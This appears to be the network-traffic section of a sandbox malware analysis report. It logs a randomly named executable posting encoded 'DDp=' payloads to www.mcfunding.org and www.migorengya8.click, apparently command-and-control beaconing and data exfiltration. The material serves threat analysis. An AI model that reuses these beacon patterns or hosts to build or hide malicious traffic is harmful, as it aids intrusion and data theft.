                                                                                                        Data Ascii: DDp=g4UhOENgM8To+Ja5Z0omnrCSJxeZXrCINekvDjkVn5LXsKXOaITcXDqvfjJqBqnz7YJMei2A0rSoreF/uHbIfdfviB3OTPddqx1/Jk2vZFdj3jgv7Et3Rm0wqHywVWkpjdlHBWQrARQRiw/83Knx7B2nHr4b810gv7wmnW6N8ZMcSySwI/V4yij/Cdc6/sFNaW2uZ+vYJa+L


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        14192.168.2.6499973.33.130.190804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:41.980679035 CET834OUTPOST /0598/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.mcfunding.org
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.mcfunding.org
                                                                                                        Referer: http://www.mcfunding.org/0598/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 70 71 35 62 56 6f 6d 68 4c 43 56 55 42 65 5a 64 4c 43 45 4e 65 67 76 44 69 78 4b 6b 4b 2f 58 69 49 2f 4f 62 4b 37 63 51 44 71 76 51 44 4a 7a 46 71 6d 65 37 5a 30 6d 65 6a 61 41 30 72 47 6f 72 63 74 2f 70 30 44 4c 5a 4e 66 74 76 68 33 49 51 2f 64 64 71 78 31 2f 4a 67 66 79 5a 46 56 6a 33 54 51 76 35 6c 74 30 63 47 30 33 70 48 79 77 43 47 6b 74 6a 64 6c 78 42 54 78 41 41 54 6f 52 69 78 76 38 33 62 6e 32 77 42 32 68 44 72 34 4c 78 58 6b 77 76 59 49 69 67 41 36 68 6e 49 41 55 58 45 50 71 55 4d 56 62 67 79 44 39 43 66 45 49 2f 4d 46 6e 59 57 4f 75 4c 70 6a 2f 47 75 62 6f 52 67 68 33 47 77 68 47 71 32 39 70 41 4e 47 54 61 51 57 48 6a 51 3d 3d
                                                                                                        Data Ascii: DDp=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkK/XiI/ObK7cQDqvQDJzFqme7Z0mejaA0rGorct/p0DLZNftvh3IQ/ddqx1/JgfyZFVj3TQv5lt0cG03pHywCGktjdlxBTxAAToRixv83bn2wB2hDr4LxXkwvYIigA6hnIAUXEPqUMVbgyD9CfEI/MFnYWOuLpj/GuboRgh3GwhGq29pANGTaQWHjQ==


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        15192.168.2.6499983.33.130.190804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:44.573451996 CET1847OUTPOST /0598/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.mcfunding.org
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.mcfunding.org
                                                                                                        Referer: http://www.mcfunding.org/0598/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 70 71 35 62 56 6f 6d 68 4c 43 56 55 42 65 5a 64 4c 43 45 4e 65 67 76 44 69 78 4b 6b 4b 6e 58 69 35 66 4f 61 72 37 63 52 44 71 76 5a 6a 4a 32 46 71 6d 6d 37 59 63 69 65 6a 47 51 30 70 2b 6f 71 2f 56 2f 6f 46 44 4c 58 4e 66 74 7a 52 33 4a 54 50 64 4d 71 78 6c 7a 4a 6b 44 79 5a 46 56 6a 33 56 55 76 33 6b 74 30 65 47 30 77 71 48 79 73 56 57 6c 34 6a 64 64 68 42 54 38 37 41 69 49 52 69 51 66 38 34 4a 50 32 79 68 32 6a 4f 4c 35 55 78 58 70 33 76 59 46 5a 67 41 6d 4c 6e 4b 63 55 58 43 2b 4a 4b 5a 31 30 6a 79 62 53 42 63 4d 43 2f 35 41 55 53 56 69 77 4c 61 53 58 49 76 6e 44 56 77 70 2b 49 68 45 69 6a 56 31 57 4f 6f 69 41 52 42 76 65 68 59 75 5a 48 7a 57 49 53 6a 6a 32 76 71 74 44 39 69 78 57 49 55 32 34 69 74 55 42 50 6d 6d 55 31 75 73 4b 71 72 6d 4e 4d 56 52 74 56 34 65 34 74 7a 69 47 71 67 47 6a 71 54 45 71 6d 52 42 37 75 5a 52 64 39 79 66 41 50 41 53 6d 54 64 68 55 31 64 48 42 51 4f 69 39 39 50 47 2f 6d 33 6c 62 67 2b 32 79 56 6a 37 72 46 54 66 55 64 39 [TRUNCATED]
                                                                                                        Data Ascii: DDp=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkKnXi5fOar7cRDqvZjJ2Fqmm7YciejGQ0p+oq/V/oFDLXNftzR3JTPdMqxlzJkDyZFVj3VUv3kt0eG0wqHysVWl4jddhBT87AiIRiQf84JP2yh2jOL5UxXp3vYFZgAmLnKcUXC+JKZ10jybSBcMC/5AUSViwLaSXIvnDVwp+IhEijV1WOoiARBvehYuZHzWISjj2vqtD9ixWIU24itUBPmmU1usKqrmNMVRtV4e4tziGqgGjqTEqmRB7uZRd9yfAPASmTdhU1dHBQOi99PG/m3lbg+2yVj7rFTfUd9UtoFEcgBdksW/G/frLwS9kndSRG4tuy7lIRtSvNjH5lNVvhVtdhnqH1A41f2Mulzfbuix7NBgRXkToV+vK3mw8R7fIGWoP5OOGYxn7FsN6fbYqafHq/3i38fgkjKyba6lCIS+yIyY1I75Q+FNJtRKm9ilKarEtEc4i9PgcRuYOn7JD+cfqcD3HVSp6k4k5wJw/bGZH3KpL9B8BI3VJxK4DNq1N9PvaMIned4I0tLh1ivgv4Oi0jOfHKjp4Joqe/Dck0PVnANi3Dk6XJESjAzPA2VIvMQNY7nxjDFElwnZmS9dGXSSdboswlFPyiAiWpQs/6tEAZJzdi4WrsjGpJp3zjSpKbJ5vdrbWbIdLCxWgh9GiQRrere0fX6yT41LVHs8LDny7FBj6mDdiCWjOvtDR6/UeVc7IJdP9DuhOWBZFgQbLkPGLHEhH5hEd35kCh08WA9DBPJjbHAj1eH8mroU0rlz8pEXRUgTE5c+d8j1zlFYVxx5YpK/qoAUTdHoiO3gej2XfJcIny6mWWvxqXoKOVIg7rRNEvMzDL3PbUOBsKX6NeQEWs+sNQ+JmFzfQ/tmDCbTZqY6FrD5Vv/PCPo5KWCIQj67DKkd7sJzod0gbfG3c8E8PzYm5caRd175W0iYU2rJX8cHGHhj6SKZFbgLVrsOwL/dblXVi [TRUNCATED]


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        16192.168.2.6499993.33.130.190804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:47.255166054 CET550OUTGET /0598/?SvrLY=3P8lALA&DDp=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM= HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.mcfunding.org
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:40:47.886740923 CET409INHTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Wed, 06 Nov 2024 07:40:47 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 269
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 53 76 72 4c 59 3d 33 50 38 6c 41 4c 41 26 44 44 70 3d 74 36 38 42 4e 30 39 69 56 65 71 62 2f 49 75 4c 46 31 6f 61 37 4c 47 44 4f 30 37 2f 57 37 43 46 49 6f 6f 63 48 51 73 33 6c 6f 7a 71 67 36 50 69 45 34 69 72 5a 42 2b 64 56 6b 52 63 4e 4b 6e 33 71 71 59 54 66 7a 2b 55 32 4b 4b 73 6b 64 52 73 76 47 76 34 54 75 2b 58 69 52 36 4e 58 6f 74 47 72 79 39 41 4e 45 65 65 52 43 6f 4e 34 46 68 62 78 6e 42 5a 53 6e 49 68 6d 30 53 7a 4b 30 4d 69 73 49 5a 6c 44 6a 4d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?SvrLY=3P8lALA&DDp=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM="}</script></head></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        17192.168.2.650000198.252.98.54804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:53.007347107 CET822OUTPOST /y3dc/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.migorengya8.click
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.migorengya8.click
                                                                                                        Referer: http://www.migorengya8.click/y3dc/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 69 77 4d 7a 34 58 74 7a 71 46 51 54 68 36 69 76 77 6b 4a 38 68 4b 46 36 30 33 42 51 33 6e 4b 4b 2b 4d 6f 70 38 55 42 71 4f 70 70 63 66 33 76 70 61 47 72 52 4e 31 6e 63 69 44 38 6b 53 46 39 39 63 4d 62 42 2b 4d 70 4d 66 54 6a 70 79 2b 35 6d 36 52 6f 78 41 76 38 71 6e 44 6a 47 61 34 78 68 48 51 71 51 32 65 35 42 62 49 39 38 30 30 49 52 51 37 30 69 31 49 50 4d 2f 4a 66 32 45 35 4b 63 4d 75 73 49 68 52 4d 32 56 56 62 4d 4b 70 51 71 65 53 37 43 4e 59 33 4b 71 78 54 48 34 56 4a 4c 63 74 73 31 4f 5a 6e 4c 57 6a 6d 76 37 43 49 2f 4e 4f 59 43 75 4e 41 73 76 6d 74 4d 4d 32 67 73
                                                                                                        Data Ascii: DDp=vjjmaXWtymtuiwMz4XtzqFQTh6ivwkJ8hKF603BQ3nKK+Mop8UBqOppcf3vpaGrRN1nciD8kSF99cMbB+MpMfTjpy+5m6RoxAv8qnDjGa4xhHQqQ2e5BbI9800IRQ70i1IPM/Jf2E5KcMusIhRM2VVbMKpQqeS7CNY3KqxTH4VJLcts1OZnLWjmv7CI/NOYCuNAsvmtMM2gs
                                                                                                        Nov 6, 2024 08:40:53.640574932 CET1033INHTTP/1.1 404 Not Found
                                                                                                        Connection: close
                                                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                        pragma: no-cache
                                                                                                        content-type: text/html
                                                                                                        content-length: 796
                                                                                                        date: Wed, 06 Nov 2024 07:40:53 GMT
                                                                                                        server: LiteSpeed
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        18192.168.2.650001198.252.98.54804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:55.615777969 CET846OUTPOST /y3dc/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.migorengya8.click
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.migorengya8.click
                                                                                                        Referer: http://www.migorengya8.click/y3dc/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 6a 54 55 7a 72 6b 56 7a 73 6c 51 63 75 61 69 76 35 45 4a 34 68 4b 42 36 30 32 46 35 33 52 69 4b 39 74 59 70 75 46 42 71 65 35 70 63 4b 48 75 6a 56 6d 72 67 4e 31 71 6a 69 44 41 6b 53 46 70 39 63 4e 72 42 2b 2f 42 50 66 44 6a 72 2b 65 35 67 30 78 6f 78 41 76 38 71 6e 44 33 6f 61 34 35 68 48 67 61 51 6b 50 35 4f 57 6f 39 2f 6b 45 49 52 44 72 30 6d 31 49 4f 6a 2f 49 43 6a 45 2f 47 63 4d 72 41 49 69 44 30 70 63 56 62 4b 4f 70 52 72 52 78 4b 30 4c 71 6d 4d 70 44 57 67 37 48 74 38 51 37 78 76 53 71 6e 6f 45 7a 47 74 37 41 51 4e 4e 75 59 6f 73 4e 34 73 39 78 68 72 44 43 46 50 2b 48 49 4a 37 4a 73 6f 4b 4b 4a 54 55 5a 56 32 71 4d 36 48 77 67 3d 3d
                                                                                                        Data Ascii: DDp=vjjmaXWtymtujTUzrkVzslQcuaiv5EJ4hKB602F53RiK9tYpuFBqe5pcKHujVmrgN1qjiDAkSFp9cNrB+/BPfDjr+e5g0xoxAv8qnD3oa45hHgaQkP5OWo9/kEIRDr0m1IOj/ICjE/GcMrAIiD0pcVbKOpRrRxK0LqmMpDWg7Ht8Q7xvSqnoEzGt7AQNNuYosN4s9xhrDCFP+HIJ7JsoKKJTUZV2qM6Hwg==
                                                                                                        Nov 6, 2024 08:40:56.266798019 CET1033INHTTP/1.1 404 Not Found
                                                                                                        Connection: close
                                                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                        pragma: no-cache
                                                                                                        content-type: text/html
                                                                                                        content-length: 796
                                                                                                        date: Wed, 06 Nov 2024 07:40:56 GMT
                                                                                                        server: LiteSpeed
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        19192.168.2.650002198.252.98.54804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:40:58.184679985 CET1859OUTPOST /y3dc/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.migorengya8.click
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.migorengya8.click
                                                                                                        Referer: http://www.migorengya8.click/y3dc/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 6a 54 55 7a 72 6b 56 7a 73 6c 51 63 75 61 69 76 35 45 4a 34 68 4b 42 36 30 32 46 35 33 52 61 4b 2b 65 41 70 38 79 39 71 64 35 70 63 57 58 75 67 56 6d 72 39 4e 31 79 76 69 44 4d 65 53 48 52 39 63 76 6a 42 33 75 42 50 4d 6a 6a 72 6a 4f 35 68 36 52 6f 42 41 76 73 75 6e 44 6e 6f 61 34 35 68 48 69 43 51 6e 65 35 4f 46 34 39 38 30 30 49 56 51 37 30 65 31 49 6d 5a 2f 49 47 7a 48 50 6d 63 4d 4b 73 49 75 57 59 70 45 46 62 49 4a 70 51 34 52 78 47 6e 4c 71 36 75 70 43 7a 46 37 45 78 38 56 75 49 75 41 4b 6e 53 62 51 36 65 76 77 34 4c 45 4c 6b 4c 74 66 6f 33 74 48 70 43 64 44 4a 63 2f 67 41 74 36 4b 6f 70 63 4c 78 44 63 76 63 79 76 74 58 43 7a 36 7a 4c 76 47 7a 69 72 6e 36 6d 63 7a 49 70 6e 59 5a 70 31 68 34 48 48 50 57 74 56 63 49 36 46 59 32 35 6f 4c 52 59 6b 50 43 6d 62 6d 50 51 53 58 48 42 62 73 53 4b 6b 77 46 35 43 56 70 6e 63 2f 42 44 58 4c 45 6b 41 67 44 6f 38 4e 43 4a 4d 6d 7a 6f 32 4d 6d 73 79 6a 49 58 47 75 4d 49 4e 2b 4a 64 72 66 63 43 63 72 2f 4e 6a 30 [TRUNCATED]
                                                                                                        Data Ascii: DDp=vjjmaXWtymtujTUzrkVzslQcuaiv5EJ4hKB602F53RaK+eAp8y9qd5pcWXugVmr9N1yviDMeSHR9cvjB3uBPMjjrjO5h6RoBAvsunDnoa45hHiCQne5OF49800IVQ70e1ImZ/IGzHPmcMKsIuWYpEFbIJpQ4RxGnLq6upCzF7Ex8VuIuAKnSbQ6evw4LELkLtfo3tHpCdDJc/gAt6KopcLxDcvcyvtXCz6zLvGzirn6mczIpnYZp1h4HHPWtVcI6FY25oLRYkPCmbmPQSXHBbsSKkwF5CVpnc/BDXLEkAgDo8NCJMmzo2MmsyjIXGuMIN+JdrfcCcr/Nj0ysQpo/Dl3VqkIkkiXRM0pchmISyg9fkYwG1voy52IUVGs9gADcOCJr5Cptd2RUBtYyLZX3gDii2b//3xYH7sETiq1AynFKf6bTXxWPT3tc6OKTZuAPwFANZzsrne/kn7lAYqs/rmsIJgBb7Xt7oj9EURBSmfo4JyyD/TztIpxA5UqroU2gYE0yMyiulKrXP36BUEFFbjr2EL5fhX7OmoSZomlMR2RRjcgOTk+QAYq+QZOWE+KTmKK8CmveemrpAwKfFcwKo94IG7OkeNDSjmPAlSPdcPIytTV652kAXEwaTnbLxE3uJKzxD1zrYkbbqAhvczoQ/I6uyFJSB9HebZ2SiBd64G5N97XMfh1UAR0oLgjoK02gwL1Xqyefsx/4jH5kiGAuInal+dvxeY4R7lKn0vrhqfKz17++nF+S3tUvObXDV4H8WNdKh2sI5gNp6jXlX1znLV5YmjJlC6W83nshw0qUlNDKjvLH73RAlx35ZoCLZMsjZ4R77+piDM16E9n8hzTepgQXXCjRRHGXd87a8J0SA0RbLt1gVo+iy032H4iPfnOMRFjCSlwM+9UAO1QCDTytcomkeyRq9pJS3t8sAcbTJBhQuZ3sbZwJ2ZxcWoctnDw6lTKaa4jjhxKQWwFbYnuGUPEZasl05zyOwsEwHaMefGEHO2PU [TRUNCATED]


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        20192.168.2.650003198.252.98.54804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:41:00.734349966 CET554OUTGET /y3dc/?DDp=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tREfAnxyZwa91URYeYbxhv5bPljMHSbrvZtVpRz6w5PNfkG2YKS2Ps=&SvrLY=3P8lALA HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.migorengya8.click
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:41:01.380016088 CET1033INHTTP/1.1 404 Not Found
                                                                                                        Connection: close
                                                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                        pragma: no-cache
                                                                                                        content-type: text/html
                                                                                                        content-length: 796
                                                                                                        date: Wed, 06 Nov 2024 07:41:01 GMT
                                                                                                        server: LiteSpeed
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
